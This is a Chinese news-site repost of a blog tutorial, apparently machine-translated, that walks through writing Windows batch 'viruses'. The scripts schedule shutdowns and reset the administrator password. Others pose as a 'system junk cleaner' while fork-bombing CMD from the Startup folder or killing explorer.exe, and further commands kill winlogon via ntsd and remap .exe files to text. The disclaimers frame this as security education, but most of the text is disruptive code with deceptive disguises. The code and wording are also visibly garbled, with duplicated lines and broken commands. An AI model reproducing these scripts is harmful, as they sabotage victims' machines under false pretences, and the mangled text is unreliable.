甘南新闻网
国内新闻 当前位置:首页 > 国内新闻 > 正文

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭

[编者按]这种病毒的意外出现使人们一提到它就脸色苍白。这就像一个黑衣人躲在骑士的斗篷下。那些被“资助”的人将会不走运。这篇文章是作者自学的网络安全教程中的一系列文章之一。它将解释简单的病毒原理知识,并通过批处理代码制作病毒,包括自动启动、密码修改、定时关机、蓝屏、进程关机等功能。我希望这篇基本文章对你们所有人都有帮助。我也希望你们所有人都能提高安全意识,学会如何预防。我也欢迎大家来讨论这个问题。

Author |杨

Editor |彦希

这篇文章经授权转载自博客专家伊斯特蒙特

Statement:我坚决反对利用教学方法进行犯罪,一切犯罪行为都将受到严惩。绿色电网需要我们的共同维护,建议每个人都理解背后的原则,并更好地保护它们。

1。关机bat Script

Computer Virus是由编译器插入计算机程序中的一组计算机指令或程序代码,它们会破坏计算机功能或数据,会影响计算机的使用,并会自我复制。计算机病毒具有传染性、隐蔽性、传染性、潜伏性、易激动性、表达性或破坏性。

计算机病毒的生命周期:发展期→感染期→潜伏期→攻击期→发现期→消化期→灭绝期。计算机病毒是一种程序,一种可执行代码。像生物病毒一样,它们具有自我繁殖、相互感染、激活和再生的特性。计算机病毒具有独特的复制能力。它们可以迅速传播,并且通常难以根除。他们可以将自己附加到各种类型的文件中。当文件从一个用户复制或传输到另一个用户时,它们会随文件一起传播。

下面解释第一批脚本,主要调用“关机”来实现关机。基本步骤如下:

创建一个新的文本文档

回车关机-s -t 600

将txt改为bat

如下图所示,运行CMD查看关机命令的基本用法。

Basic命令是:

1 shutdown -s -t 600

2//现在让系统在600秒后关闭

3

4shutdown -a

5//终止计算机关机

运行结果如下图所示:

创建一个新的“test.bat”并填写“shutdown -s -t 600”。有些系统需要在“文件夹选项”中显示“隐藏已知文件类型的扩展名”。

双击BAT文件运行关机。如果需要取消,请在CMD黑盒中输入“关机-a”命令。

II。更改密码并定期关闭病毒

下一步分享一个相对完整的病毒制作过程。

第一步,创建新的game.bat文件。

程序编写如下,其中“

echo off”表示关闭echo,“color 0a”表示设置颜色。

1

echo off

2 color 0a

3 title east mount

echo off

5 echo=========================================

6 echo menu

7 echo 1。修改管理员密码

8echo 2。定期关闭

9echo 3。退出此程序

10 e CHO=========================================

8echo 2。定期关闭

12 pause

运行如下图所示。您可以看到标题是“Eastmount program”并包含相关内容,这是批处理文件的执行过程。

echo off”表示关闭echo,“color 0a”表示设置颜色。

1

echo off

2 color 0a

3 title east mount

echo off

5 echo=========================================

6 echo menu

7 echo 1。修改管理员密码

8echo 2。定期关闭

9echo 3。退出此程序

9echo 3。退出此程序

10 e CHO=======================================

11

12 set/pnum=您的选择是:

13

14原因

输出结果如下图所示:

步骤3,补充和修改管理员密码,定时关机,退出等命令。

更改管理员密码的命令是所有微软系统的通用命令。以下代码将当前管理员密码更改为“”。

1 setuser administrator

的第二个选项是关闭,命令如下:

然后编写判断和跳转批处理代码,代码如下,“nul”表示没有运行提示信息输出。

1

echo off

2 color 0a

3 title east mount

3 title east mount

5: menu

6 echo==============================================

7 echo menu

8 echo 1。修改管理员密码

9echo 2。10echo 3时定期关闭。退出此程序

11 echo===========================================

12

13 set/P num=您的选择是:

14 if ' % num % ' '==' 1 ' ' goto 1

15 if ' % num % ' '=' 2 ' ' goto 2

16 if ' % num % ' '===' 3 ' ' goto 3

17

18:1

19 netuser administrator Nur

20确认您的密码设置成功!

21 pause

22 goto men

23

25 shut down-s-t100

26 goto men

27

29 exit

input " 1 "此时会提示系统错误,如下图所示:

同时,杀毒软件也会提示黑客修改计算机并点击"允许操作"。

然后添加“cls”命令清除屏幕。同时,为了避免输入数字“4”,将从头到尾添加一条提示消息。代码修改如下:

1

echo off

2 color 0a

3 title east mount

3 title east mount

5: menu

6 cls

7 echo======================================

8 echo menu

9 echo 1。修改管理员密码

10echo 2。11echo 3时定时关闭。退出此程序

12 echo===============================================

13

14 set/P num=您的选择是:

15 if ' % num % ' '==' 1 ' ' goto 1

16 if ' % num % ' '=' 2 ' ' goto 2

17 if ' % num % ' '===' 3 ' ' goto 3

18

19 echo您好!请输入正确的数字1-3

20 pause

21 goto menu

22

2:1

24 net user administrator Nur

25 echo您的密码已成功设置!

26 pause

27 goto men

28

29:2

30 shut down-s-t100

31 goto men

32

3:3

34 exit

runs如下图所示:

继续修改代码,补充设置用户名和新密码,关闭时间等。

1

echo off

2 color 0a

3 title east mount

3 title east mount

5: menu

6 cls

7 echo======================================

8 echo menu

9 echo 1。修改管理员密码

10echo 2。11echo 3时定时关闭。退出此程序

12 echo===============================================

13

14 set/P num=您的选择是:

15 if ' % num % ' '==' 1 ' ' goto 1

16 if ' % num % ' '=' 2 ' ' goto 2

17 if ' % num % ' '===' 3 ' ' goto 3

18

19 echo您好!请输入正确的数字1-3

20 pause

21 goto menu

22

2:1

24 set/pu=请输入用户名:

25setp=请输入新密码:

26 net user % u % % p % nul

27 echo您的密码已成功设置!

28 pause

29 goto menu

30

32 set/ptime=请输入时间:

33 shuttdown-s-t % time %

34 goto menu

35

37 exit

以“管理员”身份运行后,“张绣”用户的启动密码已成功修改。

Input 2可以设置关机时间,这里不再重复。第一部分已经详细解释。

3。启动崩溃病毒

并编写一个伪装成“系统垃圾清理”的代码。它实际上是一个导致系统崩溃的代码,不是一个“病毒”,而是一个恶作剧程序。其原理是连续打开CMD程序,占用系统资源并导致崩溃,每次打开它都会自动启动。

PS:这里有一个重点,建议您在虚拟机中运行代码。作为安全工程师,我们希望你能理解漏洞背后的原理,并更好地保护它们。绿色电网需要我们的共同维护来结束所有的非法行为。

第一步,在C:windows目录下创建文件“windows.bat”。一个" "表示覆盖文件内容,两个" "表示在文件末尾附加一个句子。

1 echo start cmd c : windows . bat

2 echo : windows . bat

用户打开此程序后,程序将继续打开cmd,占用系统资源并导致系统瘫痪。%0意味着再次执行程序。但是,这只能导致用户崩溃一次,在重新启动系统后,在没有打开这个文件后,他们将不再被招募。

第二步是将这个恶意脚本放入启动菜单,每次启动都会自动启动并导致计算机崩溃。

errorlevel是随系统变化而变化的预定义变量。如果0表示最后一个命令执行成功,如果非零表示最后一个命令执行失败,则不是Win7系统,而是执行以下命令(XP系统,2003系统)。

code "echo "表示空行,如代码

output如下图所示:

第三步,然后写下一个区号,完整的代码如下。

1

echo off

2title系统垃圾清理

3Color2F

4Echo====如果防病毒软件有恶意拦截,请选择[允许程序的所有操作]======

5 echo。

6 echo。

7

8 echo start cmd c: windows。bat

9333: echo% : windows。Bat

10

11 copyc : win dowswindows . Bat ' ' % USERPRofile % AppDataRoamingMicroSoftWindowsStart MenuProgramsStartup ' ' nul

12if % error level %==0 goto next

13

14 copy c : window Bat ' % USERPRofile % ' start '菜单程序启动' ' nul

15if % error level %==1 goto error

16

ext

18 echo。

19echo。

20echo=====垃圾清理。请不要关闭窗口=========

21echo。

22ping-n5127.0.0.1nul

23echo。

24echo=====垃圾被清除。总计500米=======

25回声。

26echo。

27echo=====建议立即重新启动计算机============

28 pause

29

error

31 echo。

32echo。

33echo=====程序运行失败,请[使用管理员权限]重新运行!========

34echo。

35因为

注意,我对重复的操作代码“:336echo% 3336windows”进行了评论。蝙蝠”,否则启动起来会很麻烦。然后运行代码,如下图所示,右键单击“以管理员身份运行”。

代码在C:windwos目录中创建批处理文件“windows.bat”。

同时,这个文件也可以在我的Win10系统启动自动目录中找到。

directory:…appdataroadmindicrosoftworkstatt menupgramsstartup

打开文件,查看写入的“start CMD”代码,这意味着打开CMD。

双击“windows.bat”文件,运行结果如下图所示。

Summary:本文编写了一个系统清理工具,它实际上是将这个windows.bat写入用户的引导自引导目录,以达到用户每次引导时运行程序,并反复调用CMD来占用资源的目的。如果感染了病毒,用户可以使用个人电脑打开启动目录删除文件或重新安装系统。同样,建议您不要让它重复运行。

IV。进程关闭病毒

看另一批代码假装清理垃圾。此命令用于终止进程,“/im explorer.exe”指示要终止的进程的名称并关闭桌面。"/f "指强迫杀人;“nul”表示不在屏幕上输出任何信息。

1 taskkill/im explorer.exe/fnul 2 nul

1

echo off

2title系统垃圾清理

3Color2F

4Echo====如果防病毒软件有恶意拦截,请选择[允许程序的所有操作]======

5 echo。

5 Echo。

6Echo。

7Echo。

8Echo=====垃圾清理正在进行。请不要关闭窗口========

9echo。

10 ping-n 5127 . 0 . 0 . 1 nul

11taskkill/imexplorer . exe/fnul 2 nul

12 echo。

13echo=====转过身。您的系统已被禁用======

14echo。

15ping-n5127.0.0.1nul

ext

17 start c:windowsexplorer.exe

18 echo。

19echo======修复!你害怕吗?O(∨_∨)O=========

20 pause

运行批处理程序,桌面将消失,如下图所示。

稍后将恢复桌面。因为作者的桌面太乱,这里只显示墙纸。

V .最简单的蓝屏炸弹文件

新文本文档

输入:NTSD-C Q-winlogon.exe,指示强制终止进程

工具-文件夹选项-视图-“隐藏已知文件类型的扩展名”选择

黑客很少攻击个人。通常,他们攻击服务器。此命令对2003

中的服务器尤其具有破坏性。双击后,服务器将显示在蓝屏上并重新启动。

ntsd是自Windows 2000以来系统的进程调试工具,在system32目录下。Ntsd使用起来非常强大和复杂,但是如果它只用于结束一些进程,它会更简单。只有系统、SMSS.EXE和CSRSS.EXE不能在视窗中被杀死。前两个是纯内核状态,最后一个是ntsd本身需要的Win32子系统。Lsass.exe也不想杀人,它负责本地账户的安全。附加到调试器的进程随调试器一起退出,因此它可用于在命令行终止进程。

打开cmd后,输入以下命令结束进程:

方法1:使用进程的pid结束进程

命令格式:ntsd -c q -p pid

命令示例:ntsd -c q -p 1332(结束explorer.exe进程)

示例详细信息:explorer . exe的pid是1332,但如何获取进程的pid?进入任务管理器下的任务列表,获取当前任务管理器中所有进程的进程标识。或者打开任务管理器,在菜单栏中选择“查看”-“选择列”,并在打开的选择窗口中钩住“过程标识符”项,这样任务管理器的过程中将会有一个以上的过程标识符项。PID的分配不是固定的,而是在进程启动时由系统随机分配的,因此进程不会在每次启动时都相同。

方法2:以进程名结束进程

命令格式:NTSD-xxxx.exe(xxxx.exe是进程名,不能保存exe命令示例:NTSD-explorer.exe-其他可以结束进程的DOS命令包括taskkill和tskill命令。

6。最简单的扩展病毒

文件格式修改或文件加密是常见的病毒,如永恒的蓝色和勒索病毒。他们加密计算机中的所有数据和文件。当你想打开一个文件时,你需要一个密码,然后通过比特币支付勒索费。

下面的小操作是将exe文件修改成一个txt文件。当遇到可执行的exe文件时,它将被视为一个txt文档,并使用记事本打开,导致可执行程序无法运行。这是这种病毒的原理。

新文本文档

添加代码:assoc . exe=txt File

Tools-文件夹选项-视图-“隐藏已知文件类型的扩展名”选中

txt以更改为bat

Start-Program-Launch,打开bat文件

双击以运行bat文件,我们的可执行文件变为txt文件。此时,系统认为exe是一个txt程序,这混淆了系统的关联。修复它很麻烦。

EXE程序如下图所示打开。

即使打开CMD也是一个文本文件。

下一步,您需要执行以下命令来恢复exe文件。Exe=exeile

恢复代码和效果如下图所示。

所有其他文件格式都转换为txt文件,如下所示。此时,如果文件扩展名被隐藏,甚至图标也可以被修改以伪装成目标应用程序,并且当用户点击时这些损害将被执行。但是,不推荐使用这种“愚蠢”的方法,因为不知道目标是否有隐藏的文件扩展名。

1 assoc.htm=txt file

2 assoc . dat=txt file

3assoc.com=txt file

4assoc.rar=txt file

5 assoc . gho=txt file

6 assoc . MVB=txt file

resolution:

如果你不幸感染了病毒,你如何解决它?如下图所示,恢复所有正确的关联。

PS:仍然有一些病毒,如VBS脚本、网页弹出窗口(网站钓鱼)等,这里就不解释了。建议读者阅读之前的“网络安全自学”第25条。“网络安全学习路径与木马、病毒及防御”初探。如果将病毒程序放在启动项目中,它将在每次打开计算机时自动执行。

7。概要

我希望这一系列的文章对你有所帮助。我真的觉得我有很好的技能,有很多东西要学。这是第44个原创安全系列,从网络安全到系统安全,从特洛伊木马病毒到后门劫持,从恶意代码到可追溯性分析,从渗透工具到二进制工具,以及Python安全、顶级论文、黑客竞赛和漏洞共享。作为一个初学者,我真的向前爬行,感谢许多人的帮助,继续爬行和加油。

欢迎讨论你是否认为这一系列的文章将帮助你!任何建议都可以被评论并告诉给读者,以相互鼓励。

侠客是伟大的,为国家和人民服务。向前线医务人员、士兵、工人、科学家和所有工人致敬。我们中国人生活的最高追求是为天地造心,为活着的人创造生活,向过去学习,为全世界创造和平。他们真的做到了。生活中没有平静的日子,但是这些人承载着我们前进的重量。我希望每个人都健康安全,戴着口罩,不出门,勤洗手,多吃东西。来吧,中国湖北武汉。让我们团结一致,振作起来,赢得胜利!

原始链接:



甘南新闻网 版权所有© www.scrape-box.com 技术支持:甘南新闻网 | 网站地图